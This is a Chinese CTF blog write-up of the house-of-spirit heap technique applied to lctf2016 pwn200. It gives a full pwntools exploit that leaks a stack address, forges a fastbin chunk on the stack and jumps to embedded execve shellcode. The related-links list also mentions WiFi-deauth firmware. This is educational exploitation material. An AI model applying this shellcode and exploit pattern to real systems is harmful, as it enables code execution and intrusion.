house-of-spirit-pwn200

最新推荐文章于 2024-02-05 11:36:00 发布
最新推荐文章于 2024-02-05 11:36:00 发布
阅读量2.5k 收藏
点赞数
分类专栏: pwn题目 文章标签: pwn 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/122434320
版权

前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完堆知识.来年好好上课(大三压力大!)有空打打比赛.

例题 : lctf2016_pwn200

house-of-spirit

利用条件:

(1)想要控制的目标区域的上方空间下方空间都是可控的内存区域

(2)存在可将堆变量指针覆盖指向为上方可控空间,从而达到将非可控空间可控空间进行合并变成fake_chunk(有点像unlink)

(3)释放堆块,将伪造的堆块释放入fastbin的单链表里面,重新拿出获得该块空间控制权

(4)更改之前非可控空间的数据,达到劫持程序执行流(getshell)

利用场景:

在这里插入图片描述

伪函数分析:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zsw822SQ-1641886903801)(house-of-spirit(pwn200)].assets/image-20220111123853145.png)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QyWcHvP6-1641886903802)(house-of-spirit(pwn200)].assets/image-20220111124218134.png)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-STk6xCWQ-1641886903802)(house-of-spirit(pwn200)].assets/image-20220111124304526.png)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-coir4eDY-1641886903803)(house-of-spirit(pwn200)].assets/image-20220111124514819.png)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kdSROTg0-1641886903804)(house-of-spirit(pwn200)].assets/image-20220111124553791.png)

本题利用思路:

  1. 通过"who are u" 写入shellcode,并泄漏rbp地址
  2. 通过"me your id ~ "布局fake chunk的next chunk的size绕过检查
  3. 通过"give me money ~"布局fake chunk的size以便伪造free chunk,并修改全局堆指针指向fake chunk 的mem位置
  4. 释放 + 重获fake chunk 拿到用作于堆块的栈空间
  5. 修改返回地址为shellcode指针

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l4xNqgvc-1641886903804)(house-of-spirit(pwn200)].assets/image-20220111144017235.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bVxmJMKj-1641886903805)(house-of-spirit(pwn200)].assets/image-20220111152443499.png)

最终exp:

# -*-coding:utf-8 -*
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./pwn200"

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
u64Leakbase = lambda offset :u64(ru("\x7f")[-6: ] + b'\0\0') - offset
u32Leakbase = lambda offset :u32(ru("\xf7")[-4: ]) - offset
it = lambda :p.interactive()


def z(s='b main'):
 gdb.attach(p,s)

def success(string,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))

def pa(s='暂停!'):
  log.success('当前执行步骤 -> '+s)
  pause()
one = [0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf03b0,0xf1247,0xf67f0]
sh = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
#start
#------------leak rbp -------------
padding = sh + (0x30 - len(sh)) * b'A' #填充0x30的数据(包括shellcode) 达到溢出rbp的地址
sa("who are u?", padding)
ru(padding)
rbp = uu64(rc(6))
success("rbp",rbp)
sh_addr = rbp - (0x7ffffec2b3b0-0x7ffffec2b360) #通过rbp计算偏移得到shellcode地址
success("shellcode addr",sh_addr)
#------------fake chunk---->next chunk size-------------
sla("ive me your id ~~?",str(0x22))# id这个值将保存在rbp-0x38处 因为fake_chunk的size为0x40 那么他就会作为next chunk的size
                           #取值要大于2*SIZE_ZE小于system_mem(0x21000) ,实测这个大小超过了1000就不行了
#------------fake chunk---------------------
fake = p64(0) + p64(0x60)  #0x60这个大小需要根据你要使用的栈指针去填写偏移值,使他的next chunk ->size指向前面填写的id值,从而绕过free检查
fake += p64(0x111111)*5 + p64(rbp-(0x7ffdf02eb6f0-0x7ffdf02eb640)) #fake的长度使最后一个p64刚好覆盖到堆指针->ptr
sa("ive me money~",fake)

#-----------free fake_chunk---------------
sla("our choice :",'2')
#-----------malloc fake_chunk-------------
sla("our choice :",'1')
sla("how long?",str(0x50)) #0x50的大小 malloc后就对应了前面的fake_chunk的大小
payload = b'B'*0x38 + p64(sh_addr) #控制这块内存进行程序流改写
sla(str(0x50),payload)
pa()
sla("our choice :",'3') #执行shellcode
it()
HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1295
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
GDB调试漏洞之house of spirit
蚁景网安学院
06-25 414
原创稿件征集邮箱:[email protected]:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
How2Heap笔记(三)
kelxLZ的博客
01-25 634
Author:ZERO-A-ONE Date:2021-01-22 一、house_of_spirit house-of-spirit 是一种 fastbins 攻击方法,通过构造 fake chunk,然后将其 free 掉,就可以在下一次 malloc 时返回 fake chunk 的地址,即任意我们可控的区域。house-of-spirit 是一种通过的 fast bin 机制来辅助栈溢出的方法,一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流,但如果栈溢出的长度无.
pwn工具箱之house of spirit
jmp esp
07-03 913
house of spirit基本信息 利用种类:利用 利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
PWN · heap | House Of Spirit】2014_hack.lu_oreo
最新发布
Mr_Fmnwon的博客
02-05 844
将chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。House of Spirit 是中的一种技术。该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即。
PWN学习之House of 系列】House Of Einherjar
weixin_41748164的博客
01-01 908
溢出写、off by one、off by null。
[pwn][利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 751
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
linux 溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2238
综述house of spirit是一种常用的溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1205
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1605
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
PWN学习之house of系列
qq_41071646的博客
08-09 1347
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个块 然后让 free到这个块 让 伪造块进入...
House of XXX的核心原理
weixin_30500473的博客
11-26 193
最近接触了溢出的pwn,对网上解释绕过safeunlink的方法(各种HouseofXXX)的解释感觉不够简洁精要,故作此总结记录。关键点可以只看红色加粗部分。 首先,溢出最好的利用方法是能覆盖关键变量,例如函数指针,但这样的场景可遇不可求。 溢出的unlink利用方法是通用的利用方法,但是在linux加入了safeunlink检查之后,这种利用方法基本失效...
lctf2016_pwn200
z1r0的博客
02-22 2678
lctf2016_pwn200 查看保护 这里有一个漏洞,read的时候可以泄露栈上的地址,因为没有\x00来截断。 这里会将buf的东西给复制到dest这里。然后ptr全局变量为dest。 这个函数就是一个add和delete的功能。 攻击思路:可以将shellcode写入第一次输入的地方,再借助这里输出ebp地址,然后算出shellcode_addr。到了strcpy这里的话可以使用\x00来截断复制功能然后填满buf,接着劫持free_got为shellcode_addr(free_got)
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 209
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
pwn刷题num46----fast bin double free (控制free chunk的fd指针指向,栈上伪造的fake chunk,修改栈上变量值)
tbsqigongzi的博客
05-03 1024
BUUCTF-PWN-metasequoia_2020_samsara 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 保护全开 动态链接 英文意思 打败魔龙后,你变成了魔龙…… 1. 抓捕一个人 2. 吃掉一个人 3. 煮一个人 4. 找到你的巢穴 5. 转移到另一个王国 6. 自杀 ida看一下伪代码 主函数 还有一个菜单函数 观察分析main函数,switch里case1每次申请chunk大小为0x20(mem为0x10), case
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值